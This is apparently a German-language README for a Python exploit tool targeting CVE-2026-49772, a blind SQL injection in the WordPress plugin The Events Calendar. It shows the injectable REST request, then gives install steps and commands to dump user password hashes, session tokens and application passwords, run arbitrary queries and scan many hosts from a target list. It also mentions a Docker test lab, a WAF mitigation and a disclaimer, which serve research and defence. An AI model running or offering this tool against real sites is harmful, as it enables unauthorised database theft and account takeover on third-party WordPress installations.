
Blind-SQL-Injection-Exploit für CVE-2026-49772, der das WordPress-Plugin The Events Calendar angreift. Extrahiert Datenbankinhalte über boolesche/zeitbasierte Orakel mit Multithread-Scanning, Benutzer-Hash-Dumping und benutzerdefinierter Abfrageunterstützung.
CVE-2026-49772 ist eine nicht authentifizierte blinde SQL-Injection im WordPress-Plugin The Events Calendar. Ein defekter REST-Parameter-Validator (validate_callback gibt eine Closure statt einer Validierung zurück) ermöglicht es dem order-Parameter in der experimentellen tec/v1 REST-API, die SQL ORDER BY-Klausel unsaniert zu erreichen:
GET /wp-json/tec/v1/events?orderby=event_date&order=<INJECTION>
... ORDER BY event_date <INJECTION>, wp_posts.post_date DESC ...
Dies ist eine schreibgeschützte Injection (keine gestapelten Abfragen, keine Schreibvorgänge, keine direkte Ausgabe) – aber die gesamte Datenbank ist über ein boolesches/zeitbasiertes Oracle extrahierbar: Benutzer-Passwort-Hashes, Sitzungstoken, Anwendungspasswörter, geheime Schlüssel.
Betroffene Versionen: The Events Calendar 6.15.12 – 6.16.2 (behoben in 6.16.3)
Schweregrad: CVSS 3.1 9.3 Kritisch — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
--check — Nicht-eingreifende Erkennung: REST-Namespace, Plugin-Version, zeitbasierte Bestätigung--recon — DB-Fingerabdruck: Version, aktueller Benutzer, Datenbank, Betriebssystem, Berechtigungen, Tabellenpräfix--users — wp_users auslesen: Anmeldenamen, E-Mails, Passwort-Hashes--user-meta — wp_usermeta auslesen: Sitzungstoken, Anwendungspasswörter, Capabilities--get-table — Beliebiges Table auslesen mit automatischer Spaltenermittlung--query — Ergebnis einer beliebigen skalaren SELECT-Abfrage extrahierenReine Python 3 Standardbibliothek — requirements.txt ist für den Standard-Workflow enthalten, installiert aber nichts zusätzliches.
git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
python3 CVE-2026-49772.py --help
git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python CVE-2026-49772.py --help
python3 CVE-2026-49772.py <target> <action> [options]
Wählen Sie genau eine Aktion: --check, --recon, --users, --user-meta,
--get-table <TABLE>, --query <SQL>. Führen Sie --help für alle Optionen aus.
python3 CVE-2026-49772.py target.tld --check
python3 CVE-2026-49772.py target.tld --recon
python3 CVE-2026-49772.py target.tld --users
python3 CVE-2026-49772.py target.tld --query "SELECT @@version"
Optimierung: --technique boolean|time, --delay, --threads, --rows, --prefix,
--where, -useragent, -timeout. Scannen Sie viele Hosts mit -l targets.txt.
Ein eigenständiges Docker Compose-Labor mit dem verwundbaren Plugin (gebündelt, nicht beim Start heruntergeladen) und vorbefüllten Events. Siehe docker/DOCKER.md.
cd docker/
docker compose up -d
python3 ../CVE-2026-49772.py localhost:8080 --check
/wp-json/tec/v1/ in der WAF / dem Reverse ProxyDieses Tool wird nur zu Bildungs- und Forschungszwecken bereitgestellt. Verwenden Sie es nur gegen Systeme, die Sie besitzen oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben. Der Ersteller übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.